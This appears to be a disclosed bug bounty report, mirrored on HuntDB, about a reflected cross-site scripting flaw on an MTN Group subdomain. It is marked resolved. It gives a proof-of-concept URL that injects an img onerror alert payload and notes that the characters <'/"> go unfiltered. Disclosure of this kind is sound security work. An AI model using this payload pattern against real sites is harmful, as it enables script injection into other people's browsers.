Loading HuntDB...

XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}

Medium
M
MTN Group
Submitted None
Reported by homosec

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
PoC ``` http://nextapps.mtnonline.com/search/suggest/q/xss<img%20src=x%20onerror=alert()>1337 ``` Symbols <'/"> are no filtered that alloweds to inject HTML code. Response has content-type: text/html {F1353600} ## Impact XSS at nextapps.mtnonline.com

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected